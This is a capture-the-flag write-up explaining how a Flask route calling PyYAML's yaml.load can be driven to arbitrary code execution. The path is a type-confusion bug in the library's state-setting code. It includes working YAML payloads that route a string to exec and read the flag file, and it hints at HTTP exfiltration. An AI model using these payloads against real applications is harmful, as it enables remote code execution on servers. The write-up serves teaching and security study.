# deserializeme

In this challenge, we're linked a website as well as its Flask backend. It consists of a single route that loads a YAML file we provide in the request body:

```python
@app.route('/', methods=["POST"])
def pwnme():
    if not re.fullmatch(b"^[\n --/-\]a-}]*$", request.data, flags=re.MULTILINE):
        return "Nice try!", 400
    return yaml.load(request.data)
```

Before anything else, I verified that this worked as intended. My template for sending YAML files and receiving the result:

```python
import requests

r = requests.post('https://deserializeme.chal.uiuc.tf/', data=open('payload.yaml').read())
print(r.text)  # {"hello":"world","number":9}
```

## Vulnerability

PyYAML is well-known for unsafe deserialization, mainly because it supports all sorts of interaction with Python. I'll reference its [documentation](https://pyyaml.org/wiki/PyYAMLDocumentation#yaml-tags-and-python-types) throughout the writeup. However, there are two restrictions to keep in mind.

First, `yaml.load` uses `FullLoader` by default, which bans the `!!python/object/apply` tag among other things. This means that we won't be able to call arbitrary functions like `eval`, although we can still construct class objects with the `!!python/object/new` tag.

Second, this challenge uses a regex filter. Among printable ASCII characters, it bans the following:

* Periods
* Carets
* Underscores
* Backticks
* Tildes (the last range in the character class, `a-}`, stops one short of `~`)

The missing period prevents us from accessing objects from other modules, which are specified with the `<module>.<name>` format. Fortunately, PyYAML will use the `builtins` module by default if you don't supply a period. I'm not sure if this is in the documentation, but the [source code](https://github.com/yaml/pyyaml/blob/master/lib3/yaml/constructor.py#L540) proves it:

```python
def find_python_name(self, name, mark, unsafe=False):
    if not name:
        raise ConstructorError("while constructing a Python object", mark,
                "expected non-empty name appended to the tag", mark)
    if '.' in name:
        module_name, object_name = name.rsplit('.', 1)
    else:
        module_name = 'builtins'
        object_name = name
```

To summarize, we can construct and reference built-in objects. However, we can't call functions directly, and our goal is arbitrary code execution.

## Exploit

This is the format for specifying class construction, as per the [documentation](https://pyyaml.org/wiki/PyYAMLDocumentation#objects):

```yaml
!!python/object/new:module.Class
args: [argument, ...]
kwds: {key: value, ...}
state: ...
listitems: [item, ...]
dictitems: [key: value, ...]
```

Right away, I was interested in the `state` field. It turns out that PyYAML uses it to add arbitrary attributes to an object after it's constructed! This won't work for most built-in types, since their instances don't accept new attributes. Fortunately, some classes are writeable: `Warning`, the `Error` types, etc. Hence the following creates an object where `obj.hello == 'world'`:

```yaml
!!python/object/new:Warning
state:
  hello: 'world'
```

Not every attribute can be set, however. PyYAML calls `check_state_key` on each key, which matches it against a blacklist regex. Keys of the form `__something__` are banned, which makes some sense. Interestingly, the key `extend` is also banned.
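
As a rough illustration of that check, here is a minimal sketch using only the standard library. The two patterns and the helper name `is_allowed_state_key` are my own assumptions, modelled on the behaviour described above (dunder keys and `extend` are rejected); they are not copied from PyYAML.

```python
import re

# Assumed blacklist, modelled on the behaviour described in the text:
# reject the literal key "extend" and any key of the form __something__.
BLACKLIST = re.compile(r"^extend$|^__.*__$")


def is_allowed_state_key(key: str) -> bool:
    """Return True if the key would pass this simplified blacklist."""
    return BLACKLIST.match(key) is None


# Print the verdict for a few candidate attribute names.
for key in ("hello", "extend", "__class__", "update"):
    print(key, is_allowed_state_key(key))
```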
PyYAML justifies the ban on `extend` in the [source code](https://github.com/yaml/pyyaml/blob/master/lib3/yaml/constructor.py#L483):

> `extend` is blacklisted because it is used by construct_python_object_apply to add `listitems` to a newly generate python instance

Let's look at the `construct_python_object_apply` method for clarification:

```python
if state:
    self.set_python_instance_state(instance, state)
if listitems:
    instance.extend(listitems)
if dictitems:
    for key in dictitems:
        instance[key] = dictitems[key]
return instance
```

Notice that if there were no blacklist, this payload would give RCE:

```yaml
!!python/object/new:Warning
state:
  extend: !!python/name:exec
listitems: 'whatever python code we want'
```

We first set `extend` to be the built-in `exec` function, using the `!!python/name` tag. Now `instance.extend` is a plain function stored on the instance, so it is not bound to `self`. PyYAML subsequently calls it on `listitems`, which is a code string! We've essentially created an object that 'spoofs' a list.

In general, this bug exists whenever code assumes the type of an object we provide and then calls one of its methods with an argument that we also control. I spent a lot of time looking for this scenario in the Flask source code, but I ended up finding one in PyYAML, coincidentally in the function which sets state. Here's the [source](https://github.com/yaml/pyyaml/blob/master/lib3/yaml/constructor.py#L595):

```python
def set_python_instance_state(self, instance, state, unsafe=False):
    if hasattr(instance, '__setstate__'):
        instance.__setstate__(state)
    else:
        slotstate = {}
        if isinstance(state, tuple) and len(state) == 2:
            state, slotstate = state
        if hasattr(instance, '__dict__'):
            if not unsafe and state:
                for key in state.keys():
                    self.check_state_key(key)
            instance.__dict__.update(state)
        elif state:
            slotstate.update(state)
        for key, value in slotstate.items():
            if not unsafe:
                self.check_state_key(key)
            setattr(instance, key, value)
```

Notice that `slotstate` is assumed to be a dictionary.
Yet if `state` is a tuple of length 2, the code destructures it into `(state, slotstate)`. Since no other type checks are performed, we have full control over both objects!

In particular, this lets us exploit `slotstate.update(state)`. We want `slotstate` to be a dummy object where `update` points to `exec`. Hence `state` should be a tuple containing a code string and the dummy object, in that order.

One final caveat: in order to reach the `elif` block, our outer class instance cannot have the `__dict__` attribute. A built-in type whose instances have no `__dict__`, like `str`, works. Here's a payload which prints the flag:

```yaml
!!python/object/new:str
state: !!python/tuple
  - 'print(getattr(open("flag\x2etxt"), "read")())'
  - !!python/object/new:Warning
    state:
      update: !!python/name:exec
```

A few more notes:

* Since periods are banned, I escaped the one in the filename. Remember that it isn't YAML that interprets the hex escape sequence (a single-quoted YAML scalar leaves `\x2e` as literal text), but Python, when `exec` compiles the string.
* In order to access object attributes and methods without periods, I used `getattr`.
* The easiest way to exfiltrate from the server is to make an HTTP request containing the flag. This is left as an exercise to the reader :smile:
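
To see the type confusion in isolation, here is a small sketch that needs neither PyYAML nor `exec`. The function `set_state_sketch` is a simplified copy of the logic quoted above with the key checks left out, and `recorder` and `fake_dict` are hypothetical names of mine; `recorder` is a harmless stand-in for `exec` that only records its argument.

```python
calls = []


def recorder(code):
    """Harmless stand-in for exec: remember what would have been run."""
    calls.append(code)


def set_state_sketch(instance, state):
    """Simplified version of the slotstate logic (key checks omitted)."""
    slotstate = {}
    if isinstance(state, tuple) and len(state) == 2:
        state, slotstate = state       # both halves come from the attacker
    if hasattr(instance, "__dict__"):
        instance.__dict__.update(state)
    elif state:
        slotstate.update(state)        # duck-typed call, no dict check
    for key, value in slotstate.items():
        setattr(instance, key, value)


# A Warning instance accepts arbitrary attributes, so it can pose as a dict.
fake_dict = Warning()
fake_dict.update = recorder

failed_later = False
try:
    # str() has no __dict__, so the elif branch is taken.
    set_state_sketch(str(), ("code string", fake_dict))
except AttributeError:
    # The fake dict has no .items(), but update() has already been called.
    failed_later = True

print(calls, failed_later)
```

In this sketch the later `slotstate.items()` call raises `AttributeError`, but only after the attacker-chosen `update` has already run, which is all the exploit needs.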